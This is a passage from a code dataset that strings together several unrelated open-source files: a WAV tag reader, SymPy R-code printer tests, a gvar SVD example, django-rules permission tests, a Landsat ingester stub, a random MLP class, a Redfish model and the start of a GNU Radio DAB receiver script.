class Wav(BlaTrack):
__slots__ = ("extensions")
extensions = ["wav"]
def _read_tags(self):
# The wave module uses fixed sampling rates. Custom sampling rates are
# therefore mapped to commonly used ones. Additionally, it doesn't
# detect compression modes like ADPCM. Therefore we just specify
# `lossless' as encoding type; it's not like these are common
# use-cases anyway.
try:
audio = wave.open(self.uri, "r")
except wave.Error:
raise TagParseError
self[SAMPLING_RATE] = audio.getframerate()
self[CHANNELS] = audio.getnchannels()
self[CHANNEL_MODE] = "Mono" if self[CHANNELS] == 1 else "Stereo"
self[BITRATE] = (audio.getframerate() * 8 * audio.getsampwidth() *
self[CHANNELS])
self[LENGTH] = audio.getnframes() / audio.getframerate()
self[FORMAT] = "WAVE"
self[ENCODING] = "lossless"
audio.close()
| gpl-2.0 | -6,617,483,503,426,571,000 | 35.62 | 78 | 0.677226 | false |
kaushik94/sympy | sympy/printing/tests/test_rcode.py | 7 | 14176 | from sympy.core import (S, pi, oo, Symbol, symbols, Rational, Integer,
GoldenRatio, EulerGamma, Catalan, Lambda, Dummy, Eq)
from sympy.functions import (Piecewise, sin, cos, Abs, exp, ceiling, sqrt,
gamma, sign, Max, Min, factorial, beta)
from sympy.sets import Range
from sympy.logic import ITE
from sympy.codegen import For, aug_assign, Assignment
from sympy.utilities.pytest import raises
from sympy.printing.rcode import RCodePrinter
from sympy.utilities.lambdify import implemented_function
from sympy.tensor import IndexedBase, Idx
from sympy.matrices import Matrix, MatrixSymbol
from sympy import rcode
from difflib import Differ
from pprint import pprint
x, y, z = symbols('x,y,z')
def test_printmethod():
class fabs(Abs):
def _rcode(self, printer):
return "abs(%s)" % printer._print(self.args[0])
assert rcode(fabs(x)) == "abs(x)"
def test_rcode_sqrt():
assert rcode(sqrt(x)) == "sqrt(x)"
assert rcode(x**0.5) == "sqrt(x)"
assert rcode(sqrt(x)) == "sqrt(x)"
def test_rcode_Pow():
assert rcode(x**3) == "x^3"
assert rcode(x**(y**3)) == "x^(y^3)"
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(1/(g(x)*3.5)**(x - y**x)/(x**2 + y)) == \
"(3.5*2*x)^(-x + y^x)/(x^2 + y)"
assert rcode(x**-1.0) == '1.0/x'
assert rcode(x**Rational(2, 3)) == 'x^(2.0/3.0)'
_cond_cfunc = [(lambda base, exp: exp.is_integer, "dpowi"),
(lambda base, exp: not exp.is_integer, "pow")]
assert rcode(x**3, user_functions={'Pow': _cond_cfunc}) == 'dpowi(x, 3)'
assert rcode(x**3.2, user_functions={'Pow': _cond_cfunc}) == 'pow(x, 3.2)'
def test_rcode_Max():
# Test for gh-11926
    assert rcode(Max(x, x*x), user_functions={"Max": "my_max", "Pow": "my_pow"}) == 'my_max(x, my_pow(x, 2))'
def test_rcode_constants_mathh():
assert rcode(exp(1)) == "exp(1)"
assert rcode(pi) == "pi"
assert rcode(oo) == "Inf"
assert rcode(-oo) == "-Inf"
def test_rcode_constants_other():
assert rcode(2*GoldenRatio) == "GoldenRatio = 1.61803398874989;\n2*GoldenRatio"
assert rcode(
2*Catalan) == "Catalan = 0.915965594177219;\n2*Catalan"
assert rcode(2*EulerGamma) == "EulerGamma = 0.577215664901533;\n2*EulerGamma"
def test_rcode_Rational():
assert rcode(Rational(3, 7)) == "3.0/7.0"
assert rcode(Rational(18, 9)) == "2"
assert rcode(Rational(3, -7)) == "-3.0/7.0"
assert rcode(Rational(-3, -7)) == "3.0/7.0"
assert rcode(x + Rational(3, 7)) == "x + 3.0/7.0"
assert rcode(Rational(3, 7)*x) == "(3.0/7.0)*x"
def test_rcode_Integer():
assert rcode(Integer(67)) == "67"
assert rcode(Integer(-1)) == "-1"
def test_rcode_functions():
assert rcode(sin(x) ** cos(x)) == "sin(x)^cos(x)"
assert rcode(factorial(x) + gamma(y)) == "factorial(x) + gamma(y)"
assert rcode(beta(Min(x, y), Max(x, y))) == "beta(min(x, y), max(x, y))"
def test_rcode_inline_function():
x = symbols('x')
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(g(x)) == "2*x"
g = implemented_function('g', Lambda(x, 2*x/Catalan))
assert rcode(
g(x)) == "Catalan = %s;\n2*x/Catalan" % Catalan.n()
A = IndexedBase('A')
i = Idx('i', symbols('n', integer=True))
g = implemented_function('g', Lambda(x, x*(1 + x)*(2 + x)))
    res = rcode(g(A[i]), assign_to=A[i])
    ref = (
"for (i in 1:n){\n"
" A[i] = (A[i] + 1)*(A[i] + 2)*A[i];\n"
"}"
)
assert res == ref
def test_rcode_exceptions():
assert rcode(ceiling(x)) == "ceiling(x)"
assert rcode(Abs(x)) == "abs(x)"
assert rcode(gamma(x)) == "gamma(x)"
def test_rcode_user_functions():
x = symbols('x', integer=False)
n = symbols('n', integer=True)
custom_functions = {
"ceiling": "myceil",
"Abs": [(lambda x: not x.is_integer, "fabs"), (lambda x: x.is_integer, "abs")],
}
assert rcode(ceiling(x), user_functions=custom_functions) == "myceil(x)"
assert rcode(Abs(x), user_functions=custom_functions) == "fabs(x)"
assert rcode(Abs(n), user_functions=custom_functions) == "abs(n)"
def test_rcode_boolean():
assert rcode(True) == "True"
assert rcode(S.true) == "True"
assert rcode(False) == "False"
assert rcode(S.false) == "False"
assert rcode(x & y) == "x & y"
assert rcode(x | y) == "x | y"
assert rcode(~x) == "!x"
assert rcode(x & y & z) == "x & y & z"
assert rcode(x | y | z) == "x | y | z"
assert rcode((x & y) | z) == "z | x & y"
assert rcode((x | y) & z) == "z & (x | y)"
def test_rcode_Relational():
from sympy import Eq, Ne, Le, Lt, Gt, Ge
assert rcode(Eq(x, y)) == "x == y"
assert rcode(Ne(x, y)) == "x != y"
assert rcode(Le(x, y)) == "x <= y"
assert rcode(Lt(x, y)) == "x < y"
assert rcode(Gt(x, y)) == "x > y"
assert rcode(Ge(x, y)) == "x >= y"
def test_rcode_Piecewise():
expr = Piecewise((x, x < 1), (x**2, True))
    res = rcode(expr)
    ref = "ifelse(x < 1,x,x^2)"
    assert res == ref
    tau = Symbol("tau")
    res = rcode(expr, tau)
    ref = "tau = ifelse(x < 1,x,x^2);"
assert res == ref
    expr = 2*Piecewise((x, x < 1), (x**2, x < 2), (x**3, True))
assert rcode(expr) == "2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3))"
res = rcode(expr, assign_to='c')
assert res == "c = 2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3));"
    # A Piecewise without a True (default) condition no longer raises here;
    # the uncovered branch is printed as NA.
    expr = 2*Piecewise((x, x < 1), (x**2, x < 2))
    assert rcode(expr) == "2*ifelse(x < 1,x,ifelse(x < 2,x^2,NA))"
def test_rcode_sinc():
from sympy import sinc
expr = sinc(x)
res = rcode(expr)
ref = "ifelse(x != 0,sin(x)/x,1)"
assert res == ref
def test_rcode_Piecewise_deep():
p = rcode(2*Piecewise((x, x < 1), (x + 1, x < 2), (x**2, True)))
assert p == "2*ifelse(x < 1,x,ifelse(x < 2,x + 1,x^2))"
expr = x*y*z + x**2 + y**2 + Piecewise((0, x < 0.5), (1, True)) + cos(z) - 1
p = rcode(expr)
ref="x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1"
assert p == ref
ref="c = x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1;"
p = rcode(expr, assign_to='c')
assert p == ref
def test_rcode_ITE():
expr = ITE(x < 1, y, z)
p = rcode(expr)
ref="ifelse(x < 1,y,z)"
assert p == ref
def test_rcode_settings():
raises(TypeError, lambda: rcode(sin(x), method="garbage"))
def test_rcode_Indexed():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o = symbols('n m o', integer=True)
i, j, k = Idx('i', n), Idx('j', m), Idx('k', o)
p = RCodePrinter()
p._not_r = set()
x = IndexedBase('x')[j]
assert p._print_Indexed(x) == 'x[j]'
A = IndexedBase('A')[i, j]
assert p._print_Indexed(A) == 'A[i, j]'
B = IndexedBase('B')[i, j, k]
assert p._print_Indexed(B) == 'B[i, j, k]'
assert p._not_r == set()
def test_rcode_Indexed_without_looking_for_contraction():
len_y = 5
y = IndexedBase('y', shape=(len_y,))
x = IndexedBase('x', shape=(len_y,))
Dy = IndexedBase('Dy', shape=(len_y-1,))
i = Idx('i', len_y-1)
    e = Eq(Dy[i], (y[i+1]-y[i])/(x[i+1]-x[i]))
code0 = rcode(e.rhs, assign_to=e.lhs, contract=False)
assert code0 == 'Dy[i] = (y[%s] - y[i])/(x[%s] - x[i]);' % (i + 1, i + 1)
def test_rcode_loops_matrix_vector():
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j], assign_to=y[i])
assert c == s
def test_dummy_loops():
# the following line could also be
# [Dummy(s, integer=True) for s in 'im']
# or [Dummy(integer=True) for s in 'im']
i, m = symbols('i m', integer=True, cls=Dummy)
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx(i, m)
expected = (
'for (i_%(icount)i in 1:m_%(mcount)i){\n'
' y[i_%(icount)i] = x[i_%(icount)i];\n'
'}'
) % {'icount': i.label.dummy_index, 'mcount': m.dummy_index}
code = rcode(x[i], assign_to=y[i])
assert code == expected
def test_rcode_loops_add():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
z = IndexedBase('z')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = x[i] + z[i];\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j] + x[i] + z[i], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_contractions():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = a[i, j, k, l]*b[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode(b[j, k, l]*a[i, j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_addfactor():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = (a[i, j, k, l] + b[i, j, k, l])*c[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode((a[i, j, k, l] + b[i, j, k, l])*c[j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_terms():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
s0 = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
)
s1 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' y[i] = b[j]*b[k]*c[i, j, k] + y[i];\n'
' }\n'
' }\n'
'}\n'
)
s2 = (
'for (i in 1:m){\n'
' for (k in 1:o){\n'
' y[i] = a[i, k]*b[k] + y[i];\n'
' }\n'
'}\n'
)
s3 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = a[i, j]*b[j] + y[i];\n'
' }\n'
'}\n'
)
c = rcode(
b[j]*a[i, j] + b[k]*a[i, k] + b[j]*b[k]*c[i, j, k], assign_to=y[i])
    ref = dict()
ref[0] = s0 + s1 + s2 + s3[:-1]
ref[1] = s0 + s1 + s3 + s2[:-1]
ref[2] = s0 + s2 + s1 + s3[:-1]
ref[3] = s0 + s2 + s3 + s1[:-1]
ref[4] = s0 + s3 + s1 + s2[:-1]
ref[5] = s0 + s3 + s2 + s1[:-1]
assert (c == ref[0] or
c == ref[1] or
c == ref[2] or
c == ref[3] or
c == ref[4] or
c == ref[5])
def test_dereference_printing():
expr = x + y + sin(z) + z
assert rcode(expr, dereference=[z]) == "x + y + (*z) + sin((*z))"
def test_Matrix_printing():
# Test returning a Matrix
mat = Matrix([x*y, Piecewise((2 + x, y>0), (y, True)), sin(z)])
A = MatrixSymbol('A', 3, 1)
p = rcode(mat, A)
assert p == (
"A[0] = x*y;\n"
"A[1] = ifelse(y > 0,x + 2,y);\n"
"A[2] = sin(z);")
# Test using MatrixElements in expressions
expr = Piecewise((2*A[2, 0], x > 0), (A[2, 0], True)) + sin(A[1, 0]) + A[0, 0]
p = rcode(expr)
assert p == ("ifelse(x > 0,2*A[2],A[2]) + sin(A[1]) + A[0]")
# Test using MatrixElements in a Matrix
q = MatrixSymbol('q', 5, 1)
M = MatrixSymbol('M', 3, 3)
m = Matrix([[sin(q[1,0]), 0, cos(q[2,0])],
[q[1,0] + q[2,0], q[3, 0], 5],
[2*q[4, 0]/q[1,0], sqrt(q[0,0]) + 4, 0]])
assert rcode(m, M) == (
"M[0] = sin(q[1]);\n"
"M[1] = 0;\n"
"M[2] = cos(q[2]);\n"
"M[3] = q[1] + q[2];\n"
"M[4] = q[3];\n"
"M[5] = 5;\n"
"M[6] = 2*q[4]/q[1];\n"
"M[7] = sqrt(q[0]) + 4;\n"
"M[8] = 0;")
def test_rcode_sgn():
expr = sign(x) * y
assert rcode(expr) == 'y*sign(x)'
p = rcode(expr, 'z')
assert p == 'z = y*sign(x);'
p = rcode(sign(2 * x + x**2) * x + x**2)
assert p == "x^2 + x*sign(x^2 + 2*x)"
expr = sign(cos(x))
p = rcode(expr)
assert p == 'sign(cos(x))'
def test_rcode_Assignment():
assert rcode(Assignment(x, y + z)) == 'x = y + z;'
assert rcode(aug_assign(x, '+', y + z)) == 'x += y + z;'
def test_rcode_For():
f = For(x, Range(0, 10, 2), [aug_assign(y, '*', x)])
sol = rcode(f)
assert sol == ("for (x = 0; x < 10; x += 2) {\n"
" y *= x;\n"
"}")
def test_MatrixElement_printing():
# test cases for issue #11821
A = MatrixSymbol("A", 1, 3)
B = MatrixSymbol("B", 1, 3)
C = MatrixSymbol("C", 1, 3)
assert(rcode(A[0, 0]) == "A[0]")
assert(rcode(3 * A[0, 0]) == "3*A[0]")
F = C[0, 0].subs(C, A - B)
assert(rcode(F) == "(A - B)[0]")
| bsd-3-clause | -5,326,308,247,995,265,000 | 27.87169 | 105 | 0.482294 | false |
gplepage/gvar | examples/svdcut.py | 1 | 2303 | """
svdcut.py --- Correlations and SVD Cuts
This code illustrates the use of SVD cuts when calculating
correlations using random samples. See the Case Study in the
documentation for more information.
"""
from __future__ import print_function
import numpy as np
import gvar as gv
try:
# may not be installed, in which case bail.
import lsqfit
except ImportError:
# fake the run so "make run" still works
outfile = open('svdcut.out', 'r').read()
print(outfile[:-1])
exit()
SHOW_PLOTS = False
def main():
gv.ranseed(4)
x = np.array([1., 2., 3., 4., 5., 6., 7., 8., 9., 10.])
y_samples = [
[2.8409, 4.8393, 6.8403, 8.8377, 10.8356, 12.8389, 14.8356, 16.8362, 18.8351, 20.8341],
[2.8639, 4.8612, 6.8597, 8.8559, 10.8537, 12.8525, 14.8498, 16.8487, 18.8460, 20.8447],
[3.1048, 5.1072, 7.1071, 9.1076, 11.1090, 13.1107, 15.1113, 17.1134, 19.1145, 21.1163],
[3.0710, 5.0696, 7.0708, 9.0705, 11.0694, 13.0681, 15.0693, 17.0695, 19.0667, 21.0678],
[3.0241, 5.0223, 7.0198, 9.0204, 11.0191, 13.0193, 15.0198, 17.0163, 19.0154, 21.0155],
[2.9719, 4.9700, 6.9709, 8.9706, 10.9707, 12.9705, 14.9699, 16.9686, 18.9676, 20.9686],
[3.0688, 5.0709, 7.0724, 9.0730, 11.0749, 13.0776, 15.0790, 17.0800, 19.0794, 21.0795],
[3.1471, 5.1468, 7.1452, 9.1451, 11.1429, 13.1445, 15.1450, 17.1435, 19.1425, 21.1432],
[3.0233, 5.0233, 7.0225, 9.0224, 11.0225, 13.0216, 15.0224, 17.0217, 19.0208, 21.0222],
[2.8797, 4.8792, 6.8803, 8.8794, 10.8800, 12.8797, 14.8801, 16.8797, 18.8803, 20.8812],
[3.0388, 5.0407, 7.0409, 9.0439, 11.0443, 13.0459, 15.0455, 17.0479, 19.0493, 21.0505],
[3.1353, 5.1368, 7.1376, 9.1367, 11.1360, 13.1377, 15.1369, 17.1400, 19.1384, 21.1396],
[3.0051, 5.0063, 7.0022, 9.0052, 11.0040, 13.0033, 15.0007, 16.9989, 18.9994, 20.9995],
]
y = gv.dataset.avg_data(y_samples)
svd = gv.dataset.svd_diagnosis(y_samples)
y = gv.svd(y, svdcut=svd.svdcut)
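    # svd_diagnosis estimates a suitable SVD cut from the sample fluctuations;
    # gv.svd then regularizes the correlation matrix of y using that cut.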
if SHOW_PLOTS:
svd.plot_ratio(show=True)
def fcn(p):
return p['y0'] + p['s'] * x
prior = gv.gvar(dict(y0='0(5)', s='0(5)'))
fit = lsqfit.nonlinear_fit(data=y, fcn=fcn, prior=prior)
print(fit)
if __name__ == '__main__':
main()
| gpl-3.0 | 5,101,233,874,259,818,000 | 40.125 | 98 | 0.583152 | false |
smcoll/django-rules | tests/testsuite/contrib/test_views.py | 1 | 6234 | from __future__ import absolute_import
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from django.http import HttpRequest, Http404
from django.test import TestCase
from django.utils.encoding import force_str
from rules.contrib.views import objectgetter
from testapp.models import Book
class FBVDecoratorTests(TestCase):
def test_objectgetter(self):
request = HttpRequest()
book = Book.objects.get(pk=1)
self.assertEqual(book, objectgetter(Book)(request, pk=1))
self.assertEqual(book, objectgetter(Book, attr_name='id')(request, id=1))
self.assertEqual(book, objectgetter(Book, field_name='id')(request, pk=1))
with self.assertRaises(ImproperlyConfigured):
# Raise if no `pk` argument is provided to the view
self.assertEqual(book, objectgetter(Book)(request, foo=1))
with self.assertRaises(ImproperlyConfigured):
# Raise if given invalid model lookup field
self.assertEqual(book, objectgetter(Book, field_name='foo')(request, pk=1))
with self.assertRaises(Http404):
# Raise 404 if no model instance found
self.assertEqual(book, objectgetter(Book)(request, pk=100000))
def test_permission_required(self):
# Adrian can change his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can change Adrian's book
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Adrian can delete his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('delete_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can *not* delete Adrian's book and is redirected to login
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('delete_book', args=(1,)))
self.assertEqual(response.status_code, 302)
# Martin can *not* delete Adrian's book and an PermissionDenied is raised
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('view_that_raises', args=(1,)))
self.assertEqual(response.status_code, 403)
# Test views that require a list of permissions
# Adrian has both permissions
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin does not have delete permission
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 302)
# Test views that accept a static object as argument
# fn is passed to has_perm as-is
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('view_with_object', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('view_with_object', args=(1,)))
self.assertEqual(response.status_code, 302)
class CBVMixinTests(TestCase):
def test_permission_required_mixin(self):
# Adrian can change his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('cbv.change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can change Adrian's book
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.change_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Adrian can delete his book
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('cbv.delete_book', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin can *not* delete Adrian's book and is redirected to login
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.delete_book', args=(1,)))
self.assertEqual(response.status_code, 302)
# Martin can *not* delete Adrian's book and an PermissionDenied is raised
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.view_that_raises', args=(1,)))
self.assertEqual(response.status_code, 403)
# Test views that require a list of permissions
# Adrian has both permissions
self.assertTrue(self.client.login(username='adrian', password='secr3t'))
response = self.client.get(reverse('cbv.view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertEqual(force_str(response.content), 'OK')
# Martin does not have delete permission
self.assertTrue(self.client.login(username='martin', password='secr3t'))
response = self.client.get(reverse('cbv.view_with_permission_list', args=(1,)))
self.assertEqual(response.status_code, 302)
| mit | 642,590,048,350,649,100 | 46.587786 | 87 | 0.677254 | false |
alex-ip/agdc | agdc/landsat_ingester/__main__.py | 1 | 2058 | #!/usr/bin/env python
# ===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===============================================================================
"""
landsat_ingester.py - Ingester script for landsat datasets.
"""
from __future__ import absolute_import
from agdc.landsat_ingester import LandsatIngester
from agdc.abstract_ingester import run_ingest
if __name__ == "__main__":
run_ingest(LandsatIngester)
| bsd-3-clause | 2,366,633,804,520,542,700 | 49.45 | 86 | 0.68999 | false |
GAMPTeam/vampyre | demos/mlp/randmlp.py | 1 | 3387 | # -*- coding: utf-8 -*-
"""
randmlp: Random MLP class definitions
@author: Sundeep
"""
import numpy as np
import pickle
"""
Randomly generated multilayer perceptron
"""
class RandomMLP:
"""
Constructor
"""
    def __init__(self, nin, nhid, nout, sparse_tgt=None):
# Get dimensions
self.nin = nin
self.nhid = nhid
self.nout = nout
self.nlayers = len(nhid)
# Sparsity target to adjust bias levels in each layer
if sparse_tgt is None:
self.sparse_tgt = 0.4*np.ones(self.nlayers)
else:
self.sparse_tgt = sparse_tgt
# Number of samples used in calibrating the parameters
self.ns = 100
# Pickle file name
self.save_file = 'mlp.p'
"""
Saves the weights to a pickle file
"""
    def save_weights(self):
pickle.dump((self.Ws,self.bs), open(self.save_file, "wb") )
"""
Restore weights
"""
    def restore_weights(self):
self.Ws, self.bs = pickle.load(open(self.save_file, "rb") )
"""
Generate random weights based on sparsity in each layer
"""
    def gen_weights(self):
# Create list to store weights and biases
self.Ws = []
self.bs = []
self.z0s = []
self.z1s = []
# Generate random input
x = np.random.randn(self.nin,self.ns)
z0 = x
for i in range(self.nlayers+1):
self.z0s.append(z0)
# Get dimensions for the layer
n0 = z0.shape[0]
if i==self.nlayers:
n1 = self.nout
stgt = 1
else:
n1 = self.nhid[i]
stgt = self.sparse_tgt[i]
# Generate linear outputs w/o bias
z0norm = np.mean(np.abs(z0)**2)
W = np.random.randn(n1,n0)/np.sqrt(n0*z0norm)
z1 = W.dot(z0)
# Sort to find the biases that adjust the correct sparsity
# level
if stgt < 1:
zsort = np.sort(z1,axis=1)
itgt = int((1-stgt)*self.ns)
b = -zsort[:,itgt]
else:
b = np.random.randn(n1)
z1 = z1 + b[:,None]
# Apply the ReLU for the next layer
z0 = np.maximum(0, z1)
# Save the weights and biases
self.Ws.append(W)
self.bs.append(b)
self.z1s.append(z1)
"""
Generate the outputs given input x
"""
    def run(self, z0=None, ns=10):
        # Generate random initial states if none are supplied
        if z0 is None:
            z0 = np.random.randn(self.nin, ns)
# Lists to store intermediate variables
zs = []
# Loop over layers
for i in range(self.nlayers+1):
# Save input
zs.append(z0)
# Linear weights
W = self.Ws[i]
b = self.bs[i]
z1 = W.dot(z0)+b[:,None]
# Save ouptut
zs.append(z1)
# ReLU for the next layer
z0 = np.maximum(0, z1)
return zs
| mit | -1,413,568,176,545,062,700 | 25.460938 | 72 | 0.459404 | false |
jlongever/redfish-client-python | on_http_redfish_1_0/models/odata_4_0_0_context.py | 1 | 2489 | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class Odata400Context(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Odata400Context - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
}
self.attribute_map = {
}
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 | -451,191,449,684,300,100 | 26.351648 | 77 | 0.55685 | false |
kit-cel/gr-dab | apps/dab_rx_constellation.py | 1 | 6407 | #!/usr/bin/env python2
# -*- coding: utf8 -*-
# Andreas Müller, 2008
# [email protected]
#
# this code may be freely used under GNU GPL conditions
"""
demodulate DAB signal and ouput to constellation sink
"""
from gnuradio import gr, uhd, blocks
from gnuradio import eng_notation
from gnuradio.eng_option import eng_option
from gnuradio.wxgui import stdgui2, fftsink2, scopesink2
import dab
from optparse import OptionParser
import wx
import sys, threading, time
class usrp_dab_gui_rx(stdgui2.std_top_block):
def __init__(self, frame, panel, vbox, argv):
stdgui2.std_top_block.__init__(self, frame, panel, vbox, argv)
self.frame = frame
self.panel = panel
parser = OptionParser(option_class=eng_option, usage="%prog: [options] <filename>")
parser.add_option("-m", "--dab-mode", type="int", default=1,
help="DAB mode [default=%default]")
parser.add_option("-F", "--filter-input", action="store_true", default=False,
help="Enable FFT filter at input")
parser.add_option('-c', '--correct-ffe', action="store_true", default=False,
help="do fine frequency correction")
parser.add_option('-u', '--correct-ffe-usrp', action="store_true", default=False,
help="do fine frequency correction by retuning the USRP instead of in software")
parser.add_option('-e', '--equalize-magnitude', action="store_true", default=False,
help="do magnitude equalization")
parser.add_option("-s", "--resample-fixed", type="eng_float", default=1,
